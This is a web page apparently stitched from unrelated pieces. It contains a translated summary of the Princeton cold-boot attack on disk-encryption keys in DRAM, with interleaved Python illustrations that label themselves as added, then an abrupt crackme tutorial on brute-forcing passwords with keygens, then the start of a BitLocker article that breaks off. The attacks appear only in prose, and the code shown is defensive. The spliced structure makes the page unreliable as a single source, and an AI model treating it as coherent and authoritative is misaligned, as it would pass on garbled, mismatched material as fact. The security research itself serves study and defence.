
Hacking hard drive encryption systems by cold boot

Researchers at Princeton University have discovered a way to bypass hard drive encryption by using the ability of RAM modules to retain information for a short period of time even after a power outage.

Foreword

Since you need to have a key to access an encrypted hard drive, and it is, of course, stored in RAM, all that is needed is to gain physical access to the PC for a few minutes. After rebooting from an external hard drive or from a USB Flash, a complete memory dump is made and the access key is retrieved from it within a few minutes.

In this way, you can get the encryption keys (and full access to the hard drive) used by BitLocker, FileVault and dm-crypt on Windows Vista, Mac OS X and Linux operating systems, as well as the popular free hard drive encryption system TrueCrypt.

The importance of this work lies in the fact that there is no simple method of protection against this method of hacking, except for turning off the power for a sufficient time to completely erase the data.

A visual demonstration of the process is presented in video.

Abstract

Contrary to popular belief, the DRAM memory used in most modern computers retains data for several seconds or minutes after a power loss; moreover, this happens at room temperature and even if the chip is removed from the motherboard. This time is quite enough to take a complete dump of RAM. We will show that this phenomenon allows an attacker with physical access to the system to bypass the OS features that protect cryptographic key material. We will show how a reboot can be used to mount successful attacks on well-known hard drive encryption systems without any specialized devices or materials. We will experimentally determine the extent and probability of data remanence and show that the time during which data can be recovered can be significantly extended using simple tricks. We will also propose new methods for locating cryptographic keys in memory dumps and for correcting errors caused by decayed bits. We will also discuss several ways to reduce these risks, but we know of no simple solution.

Introduction

Most experts assume that data from the computer's RAM is erased almost instantly after a power outage, or consider that residual data is extremely difficult to retrieve without the use of special equipment. We will show that these assumptions are incorrect. Conventional DRAM memory loses data gradually over several seconds, even at normal temperatures, and even if the memory chip is removed from the motherboard, data will remain in it for minutes or even hours, provided that the chip is stored at low temperatures. Residual data can be recovered using simple methods that require short-term physical access to the computer.

We will show a number of attacks that, using the remanence effects of DRAM, will allow us to recover the encryption keys stored in memory. This poses a real threat to laptop users who rely on hard drive encryption systems. After all, if an attacker steals a laptop, at the moment when the encrypted disk is connected, he will be able to carry out one of our attacks to access the contents, even if the laptop itself is locked or in sleep mode. We will demonstrate this by successfully attacking several popular encryption systems such as BitLocker, TrueCrypt, and FileVault. These attacks should also be successful against other encryption systems.

Although we have focused our efforts on hard drive encryption systems, once an attacker has physical access to a computer, any important information stored in RAM can become the object of an attack. It is likely that many other security systems are vulnerable. For example, we found that Mac OS X leaves account passwords in memory, where we were able to retrieve them, and we also attacked Apache's private RSA keys.

Although some in the information security and semiconductor physics communities were already aware of the DRAM remanence effect, very little information about it was available. As a result, many who design, develop, or use security systems are simply unfamiliar with this phenomenon and with how easily it can be exploited by an attacker. To the best of our knowledge, this is the first detailed work examining the implications of these phenomena for information security.

Attacks on encrypted drives

Encryption of hard drives is a well-known method of protection against data theft. Many believe that hard drive encryption systems will protect their data even if an attacker has gained physical access to the computer (in fact, that is what they are for, ed.). A California law adopted in 2002 requires reporting possible disclosures of personal data only if the data was not encrypted, because data encryption is considered a sufficient protective measure. Although the law does not describe any specific technical solutions, many experts recommend the use of hard drive or partition encryption systems, which are considered sufficient measures of protection. The results of our study show that this faith in disk encryption is unfounded. An attacker, far from the most highly skilled, can bypass many widely used encryption systems if a laptop with data is stolen while it is on or in sleep mode. And the data on a laptop can be read even if it is on an encrypted drive, so using hard drive encryption systems is not a sufficient measure.

We used several types of attacks on well-known hard drive encryption systems. Mounting the encrypted disks and verifying the correctness of the recovered encryption keys took the most time. Obtaining the RAM image and searching for keys took only a few minutes and was fully automated. There is reason to believe that most hard drive encryption systems are susceptible to such attacks.

BitLocker

BitLocker is a system included with some versions of Windows Vista. It functions as a driver between the file system and the hard disk driver, encrypting and decrypting selected sectors on demand. The keys used for encryption stay in RAM for as long as the encrypted disk is mounted.

To encrypt each sector of the hard drive, BitLocker uses the same pair of AES keys: a sector encryption key and a key used in cipher block chaining (CBC) mode. These two keys are in turn encrypted with the master key. To encrypt a sector, the plaintext is XORed with a session key obtained by encrypting the sector's byte offset with the sector encryption key. The result is then processed by two keyless mixing functions that use the Elephant diffuser developed by Microsoft; they spread changes across all bits of the sector and thereby increase the unpredictability of the encrypted sector data. At the last stage, the data is encrypted with AES in CBC mode using the corresponding key, with the initialization vector obtained by encrypting the sector's byte offset with the CBC-mode key.

We have implemented a fully automated demo attack called BitUnlocker. This uses an external USB drive with Linux OS and a modified bootloader based on SYSLINUX and the FUSE driver that allows you to connect BitLocker encrypted drives to Linux OS. On a test computer running Windows Vista, the power was turned off, a USB hard drive was connected, and booted from it. After that, BitUnlocker automatically dumped the RAM to an external drive, searched for possible keys using the keyfind program, tried all the suitable options (pairs of the sector encryption key and the CBC mode key), and, if successful, connected the encrypted drive. As soon as the disk was connected, it became possible to work with it like with any other disk. On a modern laptop with 2 gigabytes of RAM, the process took about 25 minutes.

It is noteworthy that this attack became possible to carry out without reverse engineering of any software. The Microsoft documentation describes the BitLocker system sufficiently to understand the role of the sector encryption key and the CBC mode key and create your own program that implements the entire process.

The main difference between BitLocker and other programs of this class is the way keys are stored when the encrypted drive is disconnected. By default, in basic mode, BitLocker protects the master key only with the TPM module, which exists on many modern PCs. This method, which seems to be widely used, is especially vulnerable to our attack, since it allows encryption keys to be obtained even if the computer has been turned off for a long time, because when the PC boots, the keys are automatically loaded into RAM (before the login screen appears) without any authentication data being entered.

Apparently, Microsoft experts are familiar with this problem and therefore recommend configuring BitLocker in an improved mode, where keys are protected not only with the TPM but also with a password or a key on an external USB drive. But even in this mode the system is vulnerable if an attacker gains physical access to the PC while it is running (it can even be locked or in sleep mode; the states "just turned off" and "hibernate" are considered not affected by this attack in this case).

FileVault

Apple's FileVault system has been partially researched and reverse engineered. On Mac OS X 10.4, FileVault uses a 128-bit AES key in CBC mode. When the user password is entered, a header is decrypted containing the AES key and a second key, K2, used to calculate the initialization vectors. The initialization vector for the I-th disk block is calculated as HMAC-SHA1_K2(I).

We used our EFI program to capture RAM images to retrieve data from a Macintosh computer (based on an Intel processor) with a FileVault encrypted drive attached. The keyfind program then found the FileVault AES keys automatically without error.

Even without the initialization vector, with the recovered AES key it is possible to decrypt 4080 of the 4096 bytes of each disk block (everything except the first AES block). We verified that the initialization vector is also present in the dump. Assuming the data has not been corrupted, an attacker can determine the vector by trying all 160-bit strings in the dump one by one and checking whether XORing them with the decrypted first part of the block yields plausible plaintext. Together, using programs such as vilefault, the AES key and the initialization vector allow the encrypted disk to be decrypted completely.

While investigating FileVault, we found that Mac OS X 10.4 and 10.5 leave multiple copies of a user's password in memory, where they are vulnerable to this attack. Account passwords are often used to protect keys, which in turn can be used to protect passphrases on FileVault encrypted drives.

TrueCrypt

TrueCrypt is a popular open source encryption system that runs on Windows, MacOS and Linux. It supports many algorithms including AES, Serpent and Twofish. In version 4, all algorithms worked in LRW mode; in the current 5th version, they use the XTS mode. TrueCrypt stores the encryption key and tweak key in the partition header on each drive, which is encrypted with a different key derived from the user's entered password.

We tested TrueCrypt 4.3a and 5.0a running under Linux. We mounted a disk encrypted with a 256-bit AES key, then turned off the power and booted our own memory dump software. In both cases, keyfind found the intact 256-bit encryption key. In the case of TrueCrypt 5.0a, keyfind was also able to recover the XTS-mode tweak key.

To decrypt disks created by TrueCrypt 4, the LRW-mode tweak key is also needed. We found that the system stores it four words before the AES key schedule. In our dump the LRW key was not corrupted (in the event of errors, we would still be able to recover the key).

Dm-crypt

The Linux kernel, starting with version 2.6, includes built-in support for dm-crypt, a disk encryption subsystem. Dm-crypt uses many algorithms and modes, but by default it uses a 128-bit AES cipher in CBC mode with non-key-based initialization vectors.

We tested the created dm-crypt partition using the LUKS (Linux Unified Key Setup) branch of the cryptsetup utility and the 2.6.20 kernel. The disk was encrypted using AES in CBC mode. We turned off the power for a while and using a modified PXE bootloader, we did a memory dump. The keyfind program found a valid 128-bit AES key, which was recovered without any errors. After it is restored, an attacker can decrypt and mount the dm-crypt encrypted partition by modifying the cryptsetup utility so that it accepts the keys in the required format.

Protection methods and their limitations

The implementation of protection against attacks on RAM is not trivial, since the cryptographic keys used must be stored somewhere. We propose to focus on destroying or hiding keys before an attacker can gain physical access to the PC, preventing the main memory dump software from running, physically protecting the RAM chips, and, if possible, reducing the data retention period in the RAM.

Memory overwrite

First of all, it is necessary, if possible, to avoid storing keys in RAM. It is necessary to overwrite key information when it is no longer used, and prevent data from being copied to swap files. Memory must be cleared in advance by means of the OS or additional libraries. Naturally, these measures will not protect the keys currently in use, as they must be kept in memory, such as those used for encrypted disks or on secure web servers.

Also, the RAM should be cleared during the boot process. Some PCs can be configured to clear RAM on boot using a destructive POST (Power-On Self-Test) memory test before the OS loads. If an attacker cannot prevent this test from running, he will not be able to take a memory dump with important information on this PC. But he still has the opportunity to pull out the RAM chips and insert them into another PC with the BIOS settings he needs.

Restricting booting from the network or from removable media

Many of our attacks were implemented using network boot or removable media. The PC must be configured to require an administrator password to boot from these sources. But, it should be noted that even if the system is configured to boot only from the main hard drive, an attacker can change the hard drive itself, or in many cases, reset the computer's NVRAM to revert to the original BIOS settings.

Safe Sleep

The results of the study showed that simply locking the PC desktop (that is, the OS keeps running, but a password must be entered to resume interacting with it) does not protect the contents of RAM. Sleep mode is not effective either, even if the PC is locked on returning from sleep, because an attacker can wake the machine, then restart it and take a memory dump. Hibernation (the contents of RAM are copied to the hard disk) will not help either, unless key material kept on removable media is required to restore normal operation.

With most hard drive encryption systems, users can protect themselves by shutting down the PC. (The Bitlocker system in the basic mode of the TPM module remains vulnerable, since the disk will be connected automatically when the PC is turned on). The contents of the memory may be retained for a short period after being turned off, so it is recommended that you monitor your workstation for a couple more minutes. Despite its effectiveness, this measure is extremely inconvenient due to the long loading of workstations.

Hibernation can be secured in the following ways: require a password or some other secret to "wake up" the workstation, and encrypt the contents of memory with a key derived from this password. The password must be strong, as an attacker can dump the memory and then try to guess the password by brute force. If it is not possible to encrypt the entire memory, only those areas that contain key information need to be encrypted. Some systems may be configured to enter this type of protected sleep, although this is usually not the default setting.

Avoiding precomputation

Our research has shown that using precomputation to speed up cryptographic operations makes key information more vulnerable. Precomputation means that memory holds redundant information about the key, which allows an attacker to recover the key even when there are bit errors. For example, as described in Section 5, the round keys of the AES and DES algorithms are extremely redundant and useful to an attacker.

Rejecting precomputations will reduce performance, as potentially complex calculations will have to be repeated. But, for example, you can cache pre-calculated values ​​for a certain period of time and erase the received data if they are not used during this interval. This approach represents a compromise between security and system performance.
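The compromise described above, caching precomputed values only for a bounded interval and erasing them when unused, as an added example that is not code from the paper or from any of the products discussed. The "round keys" are a constructed HMAC-derived stand-in for a real key schedule, and the cache takes an injectable clock so its behaviour can be checked without waiting; the class and function names are assumptions for this illustration.

```python
"""Time-limited cache for precomputed key material, zeroised on expiry.

Added illustration (not code from the paper or any product): precomputed
values are kept only while in use and overwritten once idle for `ttl`
seconds, so they do not linger in RAM for a cold-boot attacker to find.
"""
import hashlib
import hmac
import time


def wipe(buf: bytearray) -> None:
    """Overwrite a mutable buffer in place. Only bytearrays can be wiped;
    immutable bytes objects stay in memory until the allocator reuses them,
    which is exactly the remanence the paper exploits."""
    buf[:] = bytes(len(buf))


def expand_round_keys(master: bytes, rounds: int = 10) -> bytes:
    """Constructed stand-in for a precomputed key schedule (not AES): derive
    one 16-byte subkey per round from the master key. Like a real schedule it
    is redundant, every subkey being a function of the same master key."""
    return b"".join(
        hmac.new(master, bytes([i]), hashlib.sha256).digest()[:16]
        for i in range(1, rounds + 1)
    )


class ExpiringKeyCache:
    """Keeps precomputed values for at most `ttl` seconds of inactivity,
    then zeroises them instead of letting them linger in RAM."""

    def __init__(self, ttl: float, clock=time.monotonic):
        self.ttl = ttl
        self.clock = clock
        self._entries = {}  # name -> [bytearray value, last-use timestamp]

    def put(self, name: str, value: bytes) -> bytearray:
        self.evict_stale()
        buf = bytearray(value)
        self._entries[name] = [buf, self.clock()]
        return buf

    def get(self, name: str):
        """Return the live bytearray (callers must not copy it into immutable
        bytes) and refresh its last-use time; None once it has expired."""
        self.evict_stale()
        entry = self._entries.get(name)
        if entry is None:
            return None
        entry[1] = self.clock()
        return entry[0]

    def forget(self, name: str) -> None:
        entry = self._entries.pop(name, None)
        if entry is not None:
            wipe(entry[0])

    def evict_stale(self) -> int:
        """Wipe every entry idle longer than ttl; returns how many were wiped."""
        now = self.clock()
        stale = [n for n, (_, t) in self._entries.items() if now - t > self.ttl]
        for name in stale:
            self.forget(name)
        return len(stale)

    def clear(self) -> None:
        for name in list(self._entries):
            self.forget(name)


class FakeClock:
    """Deterministic clock for the demonstration and tests."""

    def __init__(self) -> None:
        self.t = 0.0

    def __call__(self) -> float:
        return self.t


if __name__ == "__main__":
    clk = FakeClock()
    cache = ExpiringKeyCache(ttl=60, clock=clk)
    view = cache.put("disk0", expand_round_keys(b"constructed-master-key"))
    clk.t = 30
    assert cache.get("disk0") is view        # still in use: timestamp refreshed
    clk.t = 91                               # 61 s idle: expired and wiped
    assert cache.get("disk0") is None
    print("wiped:", all(b == 0 for b in view))
```

The buffer returned by `get` is the cache's own storage, so the zeroisation on expiry reaches every holder of it; returning a copy would defeat the purpose, because the copy would outlive the cache entry.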

Key expansion

Another way to prevent key recovery is to change the way key information is stored in memory so that bit errors make recovery much harder. This method has been considered in theory, where functions were shown that are resilient to exposure: their input remains hidden even if almost all of their output has been discovered, much like one-way functions.

In practice, imagine that we have a 256-bit AES key K that is not currently in use but will be needed later. We cannot overwrite it, but we want to make it resistant to recovery attempts. One way to achieve this is to allocate a large B-bit data area, fill it with random data R, and then store in memory the result of the transformation K ⊕ H(R) (bitwise XOR, ed.), where H is a hash function such as SHA-256.

Now imagine that the power was turned off and this caused d bits in this region to change. If the hash function is strong, when attempting to recover the key K an attacker can only rely on guessing which bits of region B have changed, out of the roughly half of them that could have changed. If d bits have changed, the attacker will have to search on the order of C(B/2 + d, d) candidate patterns (a binomial coefficient) to find the correct R and then recover the key K. If the region B is large, such a search can be very long, even if d is relatively small.

Theoretically, we can store all the keys in this way, calculating each key only when we need it, and deleting it when we don't need it. Thus, by applying the above method, we can store the keys in memory.
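The K ⊕ H(R) transformation carried through in code, as an added example that is not from the paper: it hides a 256-bit key behind the SHA-256 hash of a random region, shows that recovery works only from an exact copy of R, that a single decayed bit in R already destroys the recovered key, and computes the C(B/2 + d, d) search cost. The key bytes, region size and flipped bit positions are constructed, and the function names are assumptions.

```python
"""Key hiding by XOR with the hash of a large random region.

Added illustration, not code from the paper. The stored value is
C = K xor SHA-256(R); without an exact R it reveals nothing about K.
"""
import hashlib
import math
import secrets


def hide_key(key: bytes, region_bits: int = 4096):
    """Return (R, C): a random B-bit region R and C = key xor SHA-256(R).
    R is a bytearray so it can be zeroised later; the original key can then
    be dropped. SHA-256 output is 32 bytes, matching a 256-bit key."""
    if len(key) != 32:
        raise ValueError("this illustration expects a 256-bit key")
    region = bytearray(secrets.token_bytes(region_bits // 8))
    digest = hashlib.sha256(region).digest()
    return region, bytes(k ^ h for k, h in zip(key, digest))


def recover_key(region: bytearray, hidden: bytes) -> bytes:
    """Invert the transformation: key = hidden xor SHA-256(R)."""
    digest = hashlib.sha256(region).digest()
    return bytes(c ^ h for c, h in zip(hidden, digest))


def flip_bits(region: bytearray, positions) -> None:
    """Simulate DRAM decay at the given bit positions (constructed errors)."""
    for p in positions:
        region[p // 8] ^= 1 << (p % 8)


def search_cost(region_bits: int, decayed_bits: int) -> int:
    """Number of candidate decay patterns an attacker must hash: d unknown
    positions among the roughly B/2 bits that could have changed, i.e. the
    binomial coefficient C(B/2 + d, d) from the text."""
    return math.comb(region_bits // 2 + decayed_bits, decayed_bits)


if __name__ == "__main__":
    key = bytes(range(32))                      # constructed 256-bit key
    region, hidden = hide_key(key)
    assert recover_key(region, hidden) == key   # clean region: exact recovery
    decayed = bytearray(region)
    flip_bits(decayed, [7])                     # one decayed bit
    assert recover_key(decayed, hidden) != key  # hash avalanche: key is gone
    for d in (1, 2, 8):
        print(f"d={d}: {search_cost(4096, d):,} candidate patterns")
```

A 4096-bit region is deliberately small here so the numbers stay readable; the paper's point is that B can be made as large as the memory budget allows, and the search cost grows with B for every d above zero.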

Physical protection

Some of our attacks relied on having physical access to memory chips. Such attacks can be prevented by physical memory protection. For example, the memory modules are kept in a closed PC case, or sealed with epoxy to prevent attempts to remove or access them. Also, it is possible to implement memory overwriting as a response to low temperatures or attempts to open the case. This method will require the installation of sensors with an independent power supply system. Many of these methods involve tamper-proof hardware (such as the IBM 4758 coprocessor) and can greatly increase the cost of a workstation. On the other hand, using memory soldered to the motherboard is much cheaper.

Change of architecture

The PC architecture can also be changed. This is impossible for PCs already in use, but it will allow new ones to be secured.

The first approach is to design DRAM modules in such a way that they erase all data faster. This can be tricky because the goal of erasing data as quickly as possible conflicts with the other goal of not losing data between memory refresh periods.

Another approach is to add key storage hardware that is guaranteed to erase all information from its storage on startup, restart, and shutdown. Thus, we will get a safe place to store several keys, although the vulnerability associated with their precomputation will remain.

Other experts have proposed an architecture in which the contents of the memory will be permanently encrypted. If, in addition to this, we implement the erasing of keys on reboot and power outage, then this method will provide sufficient protection against the attacks we have described.

Trusted Computing

Hardware corresponding to the concept of "trusted computing", for example, in the form of TPM modules, is already used in some PCs. Despite their usefulness in protecting against some attacks, in their current form, such equipment does not help prevent the attacks we have described.

The TPM modules in use do not implement full encryption. Instead, they monitor the boot process to decide whether it is safe to load the key into RAM. If software needs to use the key, the following can be implemented: the key, in usable form, is not released into RAM until the boot process has proceeded according to the expected scenario. But as soon as the key is in RAM, it immediately becomes a target for our attacks. TPM modules can prevent the key from being loaded into memory, but they do not prevent it from being read out of memory.

Conclusions

Contrary to popular belief, DRAM modules store data for a relatively long time when disabled. Our experiments have shown that this phenomenon makes it possible to implement a whole class of attacks that allow you to get important data, such as encryption keys, from RAM, despite the OS's attempts to protect its contents. The attacks we describe are realizable in practice, and our examples of attacks on popular encryption systems prove this.

But other types of software are also vulnerable. Digital rights management (DRM) systems often use symmetric keys stored in memory, and these can also be obtained using the methods described. As we have shown, SSL-enabled web servers are also vulnerable because they store in memory the private keys needed to create SSL sessions. Our methods of searching for key information are likely to be effective for finding passwords, account numbers, and any other important information stored in RAM.

It seems that there is no easy way to eliminate the vulnerabilities found. Changing the software will most likely not be effective; hardware changes will help, but the time and resource costs will be high; the technology of "trusted computing" in its current form is also not very effective, since it cannot protect the keys that are in memory.

In our opinion, laptops that are often in public places and operate in modes vulnerable to these attacks are most exposed to this risk. The presence of such risks shows that disk encryption protects important data to a lesser extent than is commonly believed.

As a result, you may have to consider DRAM memory as an untrusted component of a modern PC, and avoid processing important confidential information in it. But at the moment this is not practical, until the architecture of modern PCs changes to allow software to store keys in a safe place.

INTRODUCTION

Crackme
A crackme is a program (usually small, 1-2 kilobytes) for which you need to guess the password or produce a key. Crackmes are usually written to test a person's level of knowledge in cryptography and program cracking. The name comes from the English phrase "Crack Me".

At some point I needed to add support for "registration" keys to a commercial program. At that moment I had very little experience in this area: I had once tried to crack a few crackmes, but nothing worked and I quickly gave up. But when the incentive appeared, I decided to start with crackmes, and now I am studying various data encryption algorithms (such as DES, TWODES, RSA and others). It is quite possible that my next articles will be about encryption algorithms, since the use of these algorithms significantly increases the time spent on cracking.

TYPES OF CRACKME

Looking at various crackmes, I identified two main types: encrypted crackmes and those containing just an algorithm.

Decoder
Crackmes of the first kind usually contain many anti-debugging "tricks" (the complexity of these techniques depends on the level of knowledge of the person who wrote the crackme; the most common tricks are easily bypassed by people and by debuggers working in protected mode), and before you start analysing the algorithm you need to obtain the decrypted code. The harder it is to decrypt, the (most likely) more difficult the algorithm for selecting the password (or passwords) will be. Very often it turns out that an algorithm of 300 bytes can be harder to break than decrypting the crackme. Without knowledge of mathematics I also do not advise breaking crackmes that use the RSA algorithm (public-key data encryption) or similar. Naturally, it is better to start with unencrypted crackmes. I also don't recommend trying to break crackmes from the groups UCL, UCF, rPG, SOS - you're just wasting your time.

In some crackmes you need to produce a registration key rather than find a password. The process of breaking such a crackme is not much different from the "password" kind, but it is closer to breaking real programs.

CRACKME BREAKING ALGORITHM

Complex crackmes are broken by brute-forcing passwords; small programs are written for this. Most often there is only one password. The complexity increases with the size of the required password and the set of characters it can consist of.

Algorithm:

    Analysis of the password verification algorithm

    Writing a keygen (password guesser)

    Running the keygen

PASSWORD CHECK ALGORITHM ANALYSIS

For analysis, the password verification algorithm must be studied carefully. For this you need your favourite debugger (Soft Ice, TD, DeGlucker...) and to look closely at what is checked in the password. It may be checked against a checksum (crc), in which case the password will most likely have to be found by brute force; or it may check for some particular character, in which case you can "guess" the entire password or at least a few of its characters, and the rest will have to be found by brute force.

A checksum of a code section is a number (usually two or four bytes; in crackmes one byte may also be used) that contains information about that piece of code. Crackmes commonly use primitive checksum calculation procedures (archivers, for example, use crc32). Consider an example of an algorithm that calculates a checksum:

For example, all bytes of the section are added up, and the resulting number is the checksum of the section. Suppose we have a piece of code consisting of 5 bytes:

001 004 000 005 100

Its checksum will be 1+4+0+5+100=110.

The main difficulty in breaking crackmes that check the password against a crc is that a crc cannot be decomposed: knowing the password checksum, 110, we cannot find out even one of the password's elements.
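The byte-sum checksum from the example, as an added illustration that is not from the article: it reproduces the 5-byte case (checksum 110), counts how many candidate passwords of a given length and alphabet share a single checksum (which is why the sum cannot be "decomposed" into its bytes), and contrasts that with a hash-based check that accepts exactly one candidate. The password, alphabet and function names are constructed for this example.

```python
"""Why a byte-sum checksum cannot be inverted, and why it is a weak check.

Added illustration, not from the article. All inputs are constructed.
"""
import hashlib
import hmac
import itertools
import string


def byte_sum_checksum(data: bytes, width_bytes: int = 2) -> int:
    """Add up all bytes and keep the low `width_bytes` bytes, as the
    primitive checksums in crackmes do."""
    return sum(data) % (1 << (8 * width_bytes))


def search_space(alphabet_size: int, length: int) -> int:
    """Number of candidate passwords of `length` characters over the alphabet."""
    return alphabet_size ** length


def count_accepted(check, length: int, alphabet: str) -> int:
    """How many candidate passwords a verification function accepts.
    Enumerates the whole space, so keep length and alphabet small."""
    return sum(
        1 for chars in itertools.product(alphabet, repeat=length)
        if check("".join(chars).encode())
    )


def sum_check(expected: int):
    """Verifier that compares only the byte sum: every colliding password passes."""
    return lambda candidate: byte_sum_checksum(candidate) == expected


def hash_check(expected_digest: bytes):
    """Verifier that compares a SHA-256 digest in constant time: only the real
    password passes (a collision has about a 2^-256 chance per candidate)."""
    return lambda candidate: hmac.compare_digest(
        hashlib.sha256(candidate).digest(), expected_digest)


if __name__ == "__main__":
    print(byte_sum_checksum(bytes([1, 4, 0, 5, 100])))   # 110, as in the text
    real = b"123"                                        # constructed password
    digits = string.digits
    print(search_space(255, 3), search_space(52, 3), search_space(10, 3))
    print("sum check accepts:",
          count_accepted(sum_check(byte_sum_checksum(real)), 3, digits))
    print("hash check accepts:",
          count_accepted(hash_check(hashlib.sha256(real).digest()), 3, digits))
```

The two counts make the defensive point: a verifier built on a sum accepts many wrong inputs, so even a program that wants only an integrity check should compare a proper digest rather than a sum.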

WRITING A KEYGEN

For practically all types of crackmes, except the easy ones, you need to write a keygen. Almost any crackme can easily be bit-hacked (a bit hack is the replacement of several bytes), but the authors ask you to tell them the password, and, most importantly, the interest is lost.

To find a password of 3 characters you need to go through roughly 255 * 255 * 255 combinations.

The number of combinations can be reduced: for example, knowing that the password uses only English letters (upper and lower case), instead of 255 characters you only have to iterate over 52. If it is only digits, we iterate over only 10 characters.

The keygen should save the counter of checked combinations. Since brute-forcing passwords takes a long time, you can't leave the computer on for a couple of days, because you may suddenly need it. You can build into the keygen the ability to save the counter to a file, and at startup read it from the file and continue from the interrupted position.

LAUNCH KEYGEN

Brute-forcing passwords, depending on some parameters (mainly the number of possible password characters and the password size), requires a fairly long period of time. Multiple computers can be used, each of which checks some part of the combinations.

Many use the Windows encryption feature, but not everyone thinks about the security of this data protection method. Today we will talk about Bitlocker encryption and try to figure out how well Windows disk protection is implemented.



The article is written for research purposes. All information in it is for informational purposes only. It is addressed to security professionals and those who want to become one.

How does Bitlocker work?

What is Bitlocker?

BitLocker is a native disk encryption feature in Windows 7, 8, 8.1, 10 operating systems. This feature allows you to securely encrypt confidential data on your computer, both on HDD and SSD, and on removable media.

How is BitLocker set up?

The reliability of BitLocker should not be judged by the reputation of AES. A popular encryption standard may not have frankly weak points, but its implementations in specific cryptographic products often abound with them. Microsoft does not disclose the full code for BitLocker technology. It is only known that in different versions of Windows it was based on different schemes, and the changes were not commented on in any way. Moreover, in build 10586 of Windows 10, it simply disappeared, and after two builds it reappeared. However, first things first.

The first version of BitLocker used cipher block chaining (CBC) mode. Even then its shortcomings were obvious: ease of known-plaintext attacks, poor resistance to substitution attacks, and so on. Therefore, Microsoft immediately decided to strengthen the protection. Already in Vista, the Elephant Diffuser algorithm was added to the AES-CBC scheme, making it difficult to compare ciphertext blocks directly. With it, identical contents of two sectors, encrypted with the same key, gave completely different results, which complicated the search for a common pattern. However, the default key itself was short, 128 bits. Through administrative policies it can be extended to 256 bits, but is it worth it?

For users, after changing the key, nothing will change outwardly - neither the length of the entered passwords, nor the subjective speed of operations. Like most full disk encryption systems, BitLocker uses multiple keys... and none of them are visible to users. Here is a schematic diagram of BitLocker.

  • When BitLocker is activated, a master bit sequence is generated using a pseudo-random number generator. This is the full volume encryption key, FVEK. It is this key that encrypts the contents of each sector.
  • In turn, FVEK is encrypted using another key - VMK (volume master key) - and stored in encrypted form among the volume metadata.
  • The VMK itself is also encrypted, but in different ways at the user's choice.
  • On new motherboards, the VMK key is encrypted by default using the SRK key (storage root key), which is stored in a separate cryptoprocessor - a trusted platform module (TPM). The user does not have access to the TPM content, and it is unique to each computer.
  • If there is no separate TPM chip on the board, then instead of SRK, a user-entered pin code or an on-demand USB flash drive with key information pre-written on it is used to encrypt the VMK key.
  • In addition to the TPM or flash drive, you can protect the VMK key with a password.
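The layered hierarchy just described, modelled in code as an added example: a volume key (FVEK) wrapped by a master key (VMK), and the VMK wrapped once per protector (password, TPM-held key, recovery key). This is not BitLocker's own format, algorithms or key sizes; the key wrapping is encrypt-then-MAC built from HMAC-SHA256 (a PRF keystream plus a tag) so that the example runs on the standard library alone, whereas a real implementation would use an authenticated cipher. Protector names, the salt and the TPM-held key are constructed stand-ins, and all function names are assumptions.

```python
"""Toy model of a BitLocker-style key hierarchy: FVEK -> VMK -> protectors.

Added illustration, not BitLocker's code or format. Shows that any one
protector recovers the same VMK and hence the FVEK, and that adding a
protector re-wraps only the VMK.
"""
import hashlib
import hmac
import secrets

NONCE_LEN = 16
TAG_LEN = 32


def _keystream(kek: bytes, nonce: bytes, length: int) -> bytes:
    """PRF keystream: concatenated HMAC(kek, nonce || counter) blocks."""
    blocks, counter = [], 0
    while sum(map(len, blocks)) < length:
        msg = nonce + counter.to_bytes(4, "big")
        blocks.append(hmac.new(kek, msg, hashlib.sha256).digest())
        counter += 1
    return b"".join(blocks)[:length]


def wrap_key(kek: bytes, key: bytes) -> bytes:
    """Encrypt `key` under `kek` and authenticate it: nonce || ct || tag."""
    nonce = secrets.token_bytes(NONCE_LEN)
    ct = bytes(a ^ b for a, b in zip(key, _keystream(kek, nonce, len(key))))
    tag = hmac.new(kek, b"tag" + nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unwrap_key(kek: bytes, blob: bytes) -> bytes:
    """Verify the tag first, then decrypt; a wrong kek never yields a key."""
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(kek, b"tag" + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("wrong protector key or tampered metadata")
    return bytes(a ^ b for a, b in zip(ct, _keystream(kek, nonce, len(ct))))


def password_kek(password: str, salt: bytes) -> bytes:
    """Key-encryption key derived from a user password (PIN/passphrase protector)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def create_volume(protectors: dict) -> dict:
    """Generate FVEK and VMK, wrap FVEK under VMK and VMK under every
    protector's key-encryption key; only wrapped metadata is returned,
    the plaintext keys are not kept."""
    fvek = secrets.token_bytes(32)
    vmk = secrets.token_bytes(32)
    return {
        "fvek_wrapped": wrap_key(vmk, fvek),
        "vmk_wrapped": {name: wrap_key(kek, vmk) for name, kek in protectors.items()},
    }


def unlock(volume: dict, protector: str, kek: bytes) -> bytes:
    """Any single protector recovers the VMK, and the VMK recovers the FVEK."""
    vmk = unwrap_key(kek, volume["vmk_wrapped"][protector])
    return unwrap_key(vmk, volume["fvek_wrapped"])


def add_protector(volume: dict, via: str, via_kek: bytes, name: str, kek: bytes) -> None:
    """Adding a protector re-wraps the VMK only; the FVEK and the data on
    disk are untouched, which is why every protector is equally sensitive."""
    vmk = unwrap_key(via_kek, volume["vmk_wrapped"][via])
    volume["vmk_wrapped"][name] = wrap_key(kek, vmk)


if __name__ == "__main__":
    salt = b"constructed-salt"
    pw_kek = password_kek("correct horse battery", salt)
    srk = bytes(range(32))                  # stand-in for a TPM-held key
    vol = create_volume({"password": pw_kek, "tpm": srk})
    assert unlock(vol, "password", pw_kek) == unlock(vol, "tpm", srk)
    add_protector(vol, "tpm", srk, "recovery", secrets.token_bytes(32))
    print("protectors:", sorted(vol["vmk_wrapped"]))
```

The model makes the article's closing point concrete: the strength of the sector cipher is irrelevant once any one wrapped copy of the VMK can be opened, so the security of the volume is the security of its weakest protector.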

This general behavior of BitLocker continued in subsequent releases of Windows up until the present. However, BitLocker's key generation and encryption modes have changed. So, in October 2014, Microsoft quietly removed the additional Elephant Diffuser algorithm, leaving only the AES-CBC scheme with its known shortcomings. At first, no official statements were made about this. People were simply given a weakened encryption technology with the same name under the guise of an update. Vague explanations for this move followed after the simplifications in BitLocker were noticed by independent researchers.

Formally, the removal of Elephant Diffuser was required so that Windows would comply with the US Federal Information Processing Standards (FIPS), but one argument refutes this version: Vista and Windows 7, which used Elephant Diffuser, were sold in America without any problems.

